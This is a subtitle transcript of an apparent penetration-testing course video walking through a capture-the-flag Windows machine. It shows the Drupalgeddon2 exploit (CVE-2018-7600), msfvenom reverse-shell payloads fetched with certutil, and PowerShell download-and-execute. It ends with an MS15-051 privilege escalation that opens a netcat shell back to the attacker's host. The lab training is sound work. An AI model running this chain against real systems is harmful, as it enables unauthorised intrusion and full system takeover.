1
00:00:00,690 --> 00:00:04,550
Next up is a machine that is kind of similar to the last one.

2
00:00:04,560 --> 00:00:06,190
And this is by design.

3
00:00:06,330 --> 00:00:10,670
I want you to get used to practicing the basics of enumeration.

4
00:00:10,680 --> 00:00:17,130
So hopefully you're getting through these boxes and you're understanding not only the lower level parts

5
00:00:17,160 --> 00:00:18,620
but the privilege escalation.

6
00:00:18,630 --> 00:00:25,260
So you see here we've got port 80, we've got 135 and 49154, so similar to last time

7
00:00:25,260 --> 00:00:29,410
where we just have a web port and then we have two RPC pieces.

8
00:00:29,460 --> 00:00:31,700
So we're going to explore the web port first.

9
00:00:31,770 --> 00:00:36,280
We can see it's running on Microsoft IIS, and it's running Drupal 7.

10
00:00:36,330 --> 00:00:44,340
So those are interesting already, and then you can see that there are quite a few robots.txt folders

11
00:00:44,340 --> 00:00:46,800
here so we might have to explore those as well.

12
00:00:46,830 --> 00:00:50,850
So we're at 10.10.10.9, and we're just going to copy that and paste it in here

13
00:00:55,730 --> 00:00:56,050
OK.

14
00:00:56,080 --> 00:00:59,560
And it just says Welcome to 10.10.10.9.

15
00:00:59,710 --> 00:01:03,280
We have the ability to request a user password or create a new account.

16
00:01:03,280 --> 00:01:09,100
These are things that we should explore and you never know what you're going to find.

17
00:01:09,100 --> 00:01:12,790
So "not a recognized username or email address."

18
00:01:12,790 --> 00:01:18,130
So maybe we can find some sort of user enumeration here; we could try to create a new account and see

19
00:01:18,130 --> 00:01:21,430
if we can log in with that account and where that gets us.

20
00:01:21,520 --> 00:01:25,600
But first, first things first, always for me.

21
00:01:25,600 --> 00:01:31,060
I want to look at the version information, because before we even try to log in here or start exploiting

22
00:01:31,060 --> 00:01:34,340
this server, we might be jumping ahead of ourselves.

23
00:01:34,360 --> 00:01:39,520
So if you went into this path and you started ducking in, or digging in right away (you started digging

24
00:01:39,520 --> 00:01:46,570
in right away is the correct English), then you might have gone down a rabbit hole just a little bit. The

25
00:01:46,630 --> 00:01:52,260
appropriate step here, in my opinion, is that you should look at the versions: does 7.5 have any

26
00:01:52,390 --> 00:01:58,530
exploits, does this Drupal 7 have any exploits, jQuery, PHP, any of this stuff?

27
00:01:58,570 --> 00:01:58,830
OK.

28
00:01:58,900 --> 00:02:03,700
Drupal is definitely the most interesting, and I say that from my experience because I know that

29
00:02:03,700 --> 00:02:07,360
Drupal has quite a few exploits out there for it.

30
00:02:07,420 --> 00:02:14,380
So one thing that I would look at is I would just Google, and I would say Drupal 7 exploit, and

31
00:02:14,380 --> 00:02:20,680
I'm probably looking for some sort of CVE or remote code execution. Not CVE; the remote code execution

32
00:02:20,680 --> 00:02:21,930
would be interesting.

33
00:02:22,060 --> 00:02:28,240
So if I could find anything in here that is of interest for me, I'm definitely going to do it, and scrolling

34
00:02:28,240 --> 00:02:36,150
through, there's quite a few of interest. Serialization here is one that might be interesting; a remote

35
00:02:36,150 --> 00:02:40,050
code execution from 2019-6340 is interesting.

36
00:02:40,050 --> 00:02:42,990
Now just to save time I dug through a lot of these.

37
00:02:42,990 --> 00:02:45,550
It took me a little bit to actually figure this one out.

38
00:02:45,600 --> 00:02:52,500
Now there is this Drupal Drupalgeddon here, and it's actually the CVE

39
00:02:52,500 --> 00:02:53,760
2018-7600.

40
00:02:53,760 --> 00:02:56,530
Now this one is OK.

41
00:02:56,550 --> 00:02:59,550
I wasn't a big fan of this script itself.

42
00:02:59,580 --> 00:03:01,590
This is a Ruby version of the exploit.

43
00:03:02,220 --> 00:03:06,120
And it didn't allow as much flexibility as I wanted.

44
00:03:06,150 --> 00:03:13,020
So it looks like there's remote code execution, and it gives you, it gives you a shell here, but it didn't

45
00:03:13,020 --> 00:03:15,510
give the full flexibility of what I wanted.

46
00:03:15,540 --> 00:03:24,660
So what I went out and did was I said, hey, I want to know about this exploit, and then I'm just going to see

47
00:03:24,660 --> 00:03:30,930
if maybe there's something else out there, and what I ended up finding was the CVE

48
00:03:30,930 --> 00:03:34,380
2018-7600 from the GitHub of pimps.

49
00:03:34,410 --> 00:03:41,580
So I went out to this and I can see that this had a little bit more flexibility and I say that because

50
00:03:41,940 --> 00:03:45,630
we have full command execution on this machine, right?

51
00:03:45,630 --> 00:03:52,770
We have a command that we can provide to this and we can run commands in the machine and pull down information.

52
00:03:52,800 --> 00:03:55,180
So I really really really like this one.

53
00:03:55,350 --> 00:04:01,530
So we're gonna go ahead and just download this version of it, and you can grab either of these. I'm going

54
00:04:01,530 --> 00:04:07,970
to grab the 7600 and we'll just take the raw version. I'll just copy and paste it over

55
00:04:09,340 --> 00:04:16,270
and then we need to also install requests and bs4 if it's not already installed.

56
00:04:16,270 --> 00:04:17,490
So I'm just gonna do that real quick.

57
00:04:17,500 --> 00:04:18,310
I'm gonna gedit.

58
00:04:18,310 --> 00:04:28,180
We'll call this drupal.py, paste it in here, save it, and then I'm just gonna copy both of these: pip

59
00:04:28,180 --> 00:04:30,130
install and then requests

60
00:04:35,010 --> 00:04:37,520
and then I think the other one was bs4.

61
00:04:37,530 --> 00:04:42,350
So we're gonna grab the bs4, make sure we have it installed. OK.

62
00:04:42,380 --> 00:04:48,110
We didn't have that one, and now this is saying to run it as Python 3, so we can run as Python 3 even

63
00:04:48,110 --> 00:04:54,560
though we just installed with pip, so we might have to run as Python 2, but we could do python3 exploit

64
00:04:54,950 --> 00:05:02,360
or whatever we just called it; we called it drupal, drupal.py, and then the IP address of

65
00:05:02,360 --> 00:05:09,190
http://10.10.10.9, and then we'll add a command in here.

66
00:05:09,200 --> 00:05:12,200
So remember we saw the command execution.

67
00:05:12,200 --> 00:05:15,200
We're just gonna do a quick whoami and see if that actually calls back

68
00:05:21,360 --> 00:05:28,580
and we are NT AUTHORITY\IUSR, so it did call back on the whoami, so we can get more information

69
00:05:28,580 --> 00:05:29,330
about this machine.

70
00:05:29,330 --> 00:05:36,800
The goal here is, hey, I want to pull off an exploit, and the exploit I want to pull off is, I want to see

71
00:05:37,460 --> 00:05:41,770
if I get remote code execution, but I need to know the architecture of the machine.

72
00:05:42,020 --> 00:05:48,140
Now the initial one that we want to try is, I like doing the findstr version; however, piping that

73
00:05:48,140 --> 00:05:51,510
in, we can try, we can say, hey, let's do this.

74
00:05:51,800 --> 00:05:59,040
And instead of using double quotes, let's try single quotes and see if it works; if not, there's another

75
00:05:59,040 --> 00:06:01,050
command that we can attempt, and we did pull down.

76
00:06:01,080 --> 00:06:06,170
So it works just fine as long as your escaping is correct, or however your quoting is correct.

77
00:06:06,330 --> 00:06:12,360
You can see we're pulling down a Microsoft Windows Server 2008 R2 Datacenter 6.1.7600

78
00:06:12,360 --> 00:06:14,040
Build 7600.

79
00:06:14,040 --> 00:06:19,060
This is all good information now, and then a 64-bit computer.

80
00:06:19,080 --> 00:06:20,130
OK.

81
00:06:20,400 --> 00:06:22,980
So why did I run this? Remember where this came from.

82
00:06:22,980 --> 00:06:26,870
This came from PayloadsAllTheThings, and that cheat sheet is something that I use.

83
00:06:26,900 --> 00:06:31,290
So when I want to pull down systeminfo and I just need a few lines, remember from one of the very first

84
00:06:31,290 --> 00:06:35,940
videos, here comes back into play, so I don't want to pull down the whole systeminfo and I just want a few

85
00:06:35,940 --> 00:06:36,300
lines.

86
00:06:36,300 --> 00:06:39,920
And now we know we're up against this 64-bit machine.

87
00:06:40,260 --> 00:06:40,650
OK.

88
00:06:40,680 --> 00:06:47,100
So now what we're gonna do is we need to generate a payload that we can utilize and host up for this

89
00:06:47,100 --> 00:06:47,490
machine.

90
00:06:47,490 --> 00:06:55,860
So let's open up a new tab, and since this is a Windows machine, we're going to try to load up a 64-bit

91
00:06:55,860 --> 00:06:56,510
payload.

92
00:06:56,580 --> 00:07:09,690
So we're gonna say msfvenom, payload of windows/x64, and we sort of call it shell_reverse_tcp, and then

93
00:07:09,690 --> 00:07:19,620
we'll do an LHOST of 10.10.14.4, we'll do an LPORT of 443, do a file type of

94
00:07:19,750 --> 00:07:24,990
exe, and then we will dump that into shell.exe.

95
00:07:24,990 --> 00:07:27,040
How about that.

96
00:07:27,120 --> 00:07:31,450
That should just take a second.

97
00:07:31,470 --> 00:07:31,800
All right.

98
00:07:31,800 --> 00:07:38,010
And now what we're gonna do is just do our python -m SimpleHTTPServer on 80.

99
00:07:38,100 --> 00:07:42,420
This should just be like clockwork for you at this point, muscle memory.

100
00:07:42,420 --> 00:07:47,460
So what we're gonna do here is we're going to execute this command, but we're going to use our favorite

101
00:07:47,460 --> 00:07:49,020
command of certutil.

102
00:07:49,350 --> 00:07:54,660
So I'm just gonna say certutil; actually, let's make a directory first, because I don't even know where

103
00:07:54,660 --> 00:07:55,410
we're at.

104
00:07:55,530 --> 00:08:05,540
So let's make a directory of C:\. We'll call it C, we'll just call it temp, C:\temp. See if that works, or a

105
00:08:05,540 --> 00:08:10,190
quick OK, and hopefully we have that now.

106
00:08:10,220 --> 00:08:19,030
So let's go ahead and just do a quick certutil, and we can say something along the lines of -urlcache

107
00:08:19,030 --> 00:08:30,500
and we'll do a -f of http://10.10.14.4/shell.

108
00:08:30,720 --> 00:08:38,080
exe, and we're going to put that over in C:\temp\shell.exe.

109
00:08:38,300 --> 00:08:43,740
See if that works. OK, it says it completed successfully.

110
00:08:43,740 --> 00:08:45,060
That's good news for us.

111
00:08:45,750 --> 00:08:52,420
So what we're gonna do is we're going to open up netcat over here, and we're just gonna say nc -nvlp

112
00:08:52,560 --> 00:09:01,690
443, and over here we're going to execute this shell itself, or this executable, so go ahead and drop

113
00:09:01,690 --> 00:09:03,290
that.

114
00:09:03,480 --> 00:09:06,980
See if we pop a shell. We do.

115
00:09:07,000 --> 00:09:08,140
Perfect.

116
00:09:08,140 --> 00:09:09,880
whoami.

117
00:09:09,880 --> 00:09:10,300
We are.

118
00:09:10,300 --> 00:09:12,360
NT AUTHORITY\IUSR.

119
00:09:12,430 --> 00:09:13,550
Great.

120
00:09:13,570 --> 00:09:19,900
So now what we need to do is we need to see how we can elevate the shell.

121
00:09:19,940 --> 00:09:25,860
Now there is a Metasploit method; we could have taken this and gone into Metasploit, used the local exploit

122
00:09:25,880 --> 00:09:29,950
suggester, and found an easy win on this.

123
00:09:29,990 --> 00:09:37,940
So this is vulnerable to an exploit that you have seen before, which is MS16-014, and that is, if you

124
00:09:37,940 --> 00:09:43,320
have finished the exploit, the kernel exploit in the TryHackMe lab that we actually didn't

125
00:09:43,330 --> 00:09:43,790
walk through.

126
00:09:43,820 --> 00:09:49,020
So if you're doing your homework and finishing out things, you surely saw the MS16-014.

127
00:09:49,430 --> 00:09:51,170
So we're here.

128
00:09:51,170 --> 00:10:00,460
We can't use Metasploit, so let's try something different; let's use a tool called Sherlock.

129
00:10:00,460 --> 00:10:06,670
Now we've used Sherlock in the course, or at least we've talked about it, and it's similar in the sense

130
00:10:06,730 --> 00:10:12,220
of PowerUp, where PowerUp's looking for exploits, but Sherlock itself, and PowerUp is a fine way to go

131
00:10:12,220 --> 00:10:17,650
if you went that way first; Sherlock is going to tell us any sort of exploit we might be able to find

132
00:10:17,680 --> 00:10:23,530
from a kernel perspective, or just from an architecture or build perspective, and we can do the same thing

133
00:10:23,530 --> 00:10:24,790
with systeminfo.

134
00:10:24,790 --> 00:10:27,790
I'm just trying to show you different methods here at this point.

135
00:10:28,000 --> 00:10:35,110
So let's go ahead and find Sherlock, so I'm going to open up a new window and we're just going to locate

136
00:10:35,200 --> 00:10:38,880
Sherlock, so we're just gonna type in locate sherlock.

137
00:10:38,940 --> 00:10:40,270
ps1.

138
00:10:40,360 --> 00:10:44,860
Now if you have PowerShell Empire installed, you can use the PowerShell Empire one, but you should already

139
00:10:44,860 --> 00:10:47,990
have it downloaded from earlier lessons in the course.

140
00:10:47,990 --> 00:10:52,900
So let's go ahead and cd to Downloads, and we're just going to gedit sherlock.

141
00:10:52,960 --> 00:11:01,010
ps1, and at the very bottom what you should have here is Find-AllVulns, so go ahead and write

142
00:11:01,010 --> 00:11:06,200
that in if you don't, and the reason is the same thing as PowerUp when we did the Invoke.

143
00:11:06,200 --> 00:11:07,900
Find-AllVulns, or Find-Vulns.

144
00:11:07,910 --> 00:11:12,260
The reason we're doing this is because we're gonna execute this and call it all at once.

145
00:11:12,260 --> 00:11:15,020
Now we did that in the original lessons.

146
00:11:15,020 --> 00:11:18,140
We did that with access to a machine.

147
00:11:18,230 --> 00:11:22,400
So this time, what we're gonna do is we're going to change it up just a little bit, and we're gonna do

148
00:11:22,400 --> 00:11:25,070
a PowerShell download and call.

149
00:11:25,070 --> 00:11:29,900
So this download and call can be run all at once, where you download it, or download and execute,

150
00:11:29,900 --> 00:11:36,680
I should say, this file. So what we're gonna need to do is we're going to need to host up python -m SimpleHTTPServer

151
00:11:36,680 --> 00:11:43,730
on 80, and on our actual C here on the machine.

152
00:11:43,730 --> 00:11:49,850
I'm going to cd over to the temp directory we created, and I'm going to pull over something that I will

153
00:11:49,850 --> 00:11:54,230
share with you if you've never seen it before, so it is fantastic.

154
00:11:54,230 --> 00:11:57,290
This resource, the book HackTricks.

155
00:11:57,320 --> 00:11:59,690
They should not be new to you, right?

156
00:11:59,690 --> 00:12:00,760
They should have.

157
00:12:00,800 --> 00:12:02,160
You should have seen this before.

158
00:12:02,210 --> 00:12:07,490
You should have also seen it from the WinPEAS and lots of different resources throughout the course.

159
00:12:07,490 --> 00:12:13,670
But here you could see that we have Basic PowerShell for Pentesters, and there are all kinds of commands

160
00:12:13,670 --> 00:12:18,770
in here that are fantastic, so definitely worth looking at and getting familiar with.

161
00:12:18,890 --> 00:12:22,430
But the download and execute commands are great.

162
00:12:22,430 --> 00:12:28,880
There's one in particular that, if you look, it says, hey, this downloads from a command line; it downloads

163
00:12:28,880 --> 00:12:30,590
and executes and that's what I want.

164
00:12:30,590 --> 00:12:34,770
So this just is the echo command that will download and execute this file.

165
00:12:34,940 --> 00:12:41,260
So if we go into our text editor and we just open up a new tab, all I'm going to do here is I'm going

166
00:12:41,260 --> 00:12:47,750
to change this out, and I'm going to say top for, it looks like this person was using Hack The Box when

167
00:12:47,750 --> 00:12:51,670
they're saving their notes; we're gonna just say sherlock.

168
00:12:52,910 --> 00:12:56,910
ps1, copy this, and hopefully this will work.

169
00:12:56,990 --> 00:13:03,860
So we're going to try to run this here, and I'm just gonna paste, hit enter, and that should download the

170
00:13:03,860 --> 00:13:12,750
file; we should see a hit. There's the hit, and now hopefully it'll start executing the file. OK.

171
00:13:12,760 --> 00:13:15,590
And it takes just a little bit for this to come back.

172
00:13:15,600 --> 00:13:21,110
So if you need to pause while it's running, if it looks like it's frozen, it's not frozen.

173
00:13:21,150 --> 00:13:23,080
You just got to give it some time.

174
00:13:23,100 --> 00:13:32,270
So what we see when we go through here is that we've got a bunch of different exploits to try, as familiar

175
00:13:32,270 --> 00:13:33,370
as KiTrap0D.

176
00:13:33,440 --> 00:13:39,440
So if we were on, for example, if we're on our machine, we might even be able to exploit the KiTrap0D,

177
00:13:39,950 --> 00:13:41,860
but there is one in here.

178
00:13:41,870 --> 00:13:48,710
If you go through all of these and you try to exploit them, there's one that is exploitable, at least

179
00:13:48,710 --> 00:13:49,010
one.

180
00:13:49,010 --> 00:13:54,800
There might be more, but as you go down the list, and I tried down the list, the first one that I found that

181
00:13:54,800 --> 00:13:59,440
worked for me was this MS15-051.

182
00:13:59,690 --> 00:14:06,440
So there is an Exploit-DB one for it, but however, I like to use the GitHub that we're familiar with.

183
00:14:06,440 --> 00:14:10,190
So let's go ahead and just do MS15-051.

184
00:14:10,580 --> 00:14:19,170
We'll go out to Google MS15-051 exploit, and we should have our Windows kernel exploits.

185
00:14:19,170 --> 00:14:21,180
So let's go ahead and go into there.

186
00:14:21,200 --> 00:14:21,410
All right.

187
00:14:21,410 --> 00:14:25,850
So now we're here, and let's go ahead and download this zip here.

188
00:14:25,850 --> 00:14:30,890
I've tried a few of these different ones, and for whatever reason this is the only one I could get to work.

189
00:14:30,890 --> 00:14:36,080
So the compiled version was not working; if you tried that and it failed and you moved on, then,

190
00:14:36,530 --> 00:14:38,620
Unfortunately this is where it was at.

191
00:14:38,630 --> 00:14:40,430
But maybe you found a different way to route it.

192
00:14:40,790 --> 00:14:48,260
So we're gonna go in here and just download this zip, and then dive in and go right to this ms15-051

193
00:14:48,260 --> 00:14:55,910
x64.exe, and I'm going to put this into my transfer folder, so remember we have that transfer

194
00:14:55,910 --> 00:14:57,050
folder down here

195
00:15:00,000 --> 00:15:04,080
almost and drop it into here and I will explain why.

196
00:15:04,620 --> 00:15:12,660
So what we're going to be doing is we're going to be transferring over a netcat and ms15-051x64

197
00:15:12,690 --> 00:15:17,100
because we need netcat to be able to actually execute out.

198
00:15:17,100 --> 00:15:21,580
So what we're going to do is, I've got the transfer folder up and running here.

199
00:15:21,840 --> 00:15:24,360
So I'm just going to host the SimpleHTTPServer

200
00:15:27,300 --> 00:15:30,390
on 80, and then I'm going to do a couple of certutil calls.

201
00:15:30,390 --> 00:15:41,470
So the first one is certutil -urlcache -f, and we're gonna say 10.10.14.4/nc.

202
00:15:41,490 --> 00:15:42,360
exe.

203
00:15:42,360 --> 00:15:44,180
nc.exe.

204
00:15:45,390 --> 00:15:45,720
OK.

205
00:15:45,720 --> 00:15:55,140
So that one grabbed, and then the next one I'm going to do is this one, which was ms15-051

206
00:15:55,140 --> 00:16:05,850
x64.exe, and I'll just call this ms15.exe on the transfer over; it'll just be a little

207
00:16:05,850 --> 00:16:06,910
easier.

208
00:16:06,990 --> 00:16:11,760
So then what we need to do is we just say ms15.exe, and we need to give it a command, so we're

209
00:16:11,760 --> 00:16:15,660
gonna say run netcat as system-level privileges.

210
00:16:15,660 --> 00:16:22,400
And when you do run it, we're gonna go ahead and just say that I want to connect out to 10.10.

211
00:16:22,410 --> 00:16:26,120
14.4; we'll say on 4444.

212
00:16:26,160 --> 00:16:33,920
And when you do it, execute command cmd.exe, and before we run this, let's go ahead and come over here and

213
00:16:33,920 --> 00:16:43,270
just listen on netcat 4444, and then we're going to try to run this, cross our fingers, hey, oh, let's

214
00:16:43,270 --> 00:16:47,510
see if it works: NT AUTHORITY\SYSTEM.

215
00:16:47,540 --> 00:16:48,780
Perfect.

216
00:16:48,860 --> 00:16:55,040
So this one was a little bit more complex than the last one, in my opinion, especially if you were trying

217
00:16:55,040 --> 00:16:59,510
this on your own; it might have taken you some time, at least a few hours. If you got it in under a few

218
00:16:59,510 --> 00:16:59,860
hours.

219
00:16:59,870 --> 00:17:02,710
Good job you're doing really really well.

220
00:17:02,750 --> 00:17:07,940
So there are a lot of little rabbit holes in this machine, especially starting with Drupal, and

221
00:17:07,940 --> 00:17:12,560
Drupal is the web server, and you could have gone down the rabbit hole of trying to create an account or

222
00:17:12,560 --> 00:17:18,350
logging in; you could have looked at a number of all the exploits that were out there; you could have

223
00:17:18,350 --> 00:17:25,130
taken the route of the Ruby exploit that was there first before finding the pimps exploit and going

224
00:17:25,130 --> 00:17:31,310
that route, and then just kind of channeling this into different types of execution; you could have used

225
00:17:31,310 --> 00:17:33,610
the Windows exploit checker.

226
00:17:33,620 --> 00:17:39,590
I wanted to show Sherlock here just to show that you have options, and you can use PowerShell, you can

227
00:17:39,590 --> 00:17:41,610
use PowerShell download and execute.

228
00:17:41,870 --> 00:17:44,500
From there we were able to do research.

229
00:17:44,510 --> 00:17:49,640
Now the research for me took a little bit of time just to find the appropriate kernel exploit.

230
00:17:49,640 --> 00:17:56,540
So I lost shell several times doing that but eventually I found the exploit and we were able to elevate.

231
00:17:56,570 --> 00:18:00,290
So it just takes a little bit of research a little bit of time persistence.

232
00:18:00,290 --> 00:18:04,530
There is no easy way with most of these privescs.

233
00:18:04,550 --> 00:18:05,770
It just takes time.

234
00:18:05,870 --> 00:18:08,300
So you got to see a couple of kernel exploits.

235
00:18:08,300 --> 00:18:13,220
I want to hammer those home, that you should be looking at those. From here it's going to increase a little

236
00:18:13,220 --> 00:18:15,810
bit in difficulty through the next three boxes.

237
00:18:15,890 --> 00:18:19,380
So buckle down we're gonna get through this.

238
00:18:19,430 --> 00:18:22,840
So give the next box a go, and hopefully you did really well.

239
00:18:23,030 --> 00:18:25,780
But I'll see you in the next machine when we walk through that one.
